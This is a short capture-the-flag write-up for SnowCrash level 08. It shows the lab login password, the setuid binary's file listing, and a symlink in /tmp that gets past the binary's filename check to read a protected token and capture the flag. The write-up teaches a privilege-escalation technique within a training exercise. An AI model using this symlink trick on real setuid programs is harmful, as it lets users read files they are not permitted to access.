51 lines
1.3 KiB
Markdown
51 lines
1.3 KiB
Markdown
# Level 08
|
|
|
|
## how to login
|
|
|
|
username: level08
|
|
|
|
password: fiumuikeil55xe9cu4dood66h
|
|
|
|
## Goal
|
|
|
|
run `getflag` as user `flag08`
|
|
|
|
## Actually doing something
|
|
|
|
```bash
|
|
level08@SnowCrash:~$ ll
|
|
total 28
|
|
dr-xr-x---+ 1 level08 level08 140 Mar 5 2016 ./
|
|
d--x--x--x 1 root users 340 Aug 30 2015 ../
|
|
-r-x------ 1 level08 level08 220 Apr 3 2012 .bash_logout*
|
|
-r-x------ 1 level08 level08 3518 Aug 30 2015 .bashrc*
|
|
-rwsr-s---+ 1 flag08 level08 8617 Mar 5 2016 level08*
|
|
-r-x------ 1 level08 level08 675 Apr 3 2012 .profile*
|
|
-rw------- 1 flag08 flag08 26 Mar 5 2016 token
|
|
```
|
|
|
|
intresting, we have the usual setuid binary, but we also have a file we can't read named token. I wonder if the flag is there
|
|
|
|
lets run the binary and see what happens
|
|
|
|
```bash
|
|
level08@SnowCrash:~$ ./level08
|
|
./level08 [file to read]
|
|
level08@SnowCrash:~$ ./level08 token
|
|
You may not access 'token'
|
|
```
|
|
It is a little bit smart, lets try to outsmart it by using symlinks
|
|
|
|
```bash
|
|
level08@SnowCrash:~$ ln -s $(realpath token) /tmp/level08
|
|
level08@SnowCrash:~$ ./level08 /tmp/level08
|
|
quif5eloekouj29ke0vouxean
|
|
```
|
|
the old tale of checking for filename, and not actual file !
|
|
|
|
we can now get the actual token with that password:
|
|
```bash
|
|
level08@SnowCrash:~$ su flag08 -c getflag
|
|
Password:
|
|
Check flag.Here is your token : 25749xKZ8L7DkSCwJkT9dyv6f
|
|
```
|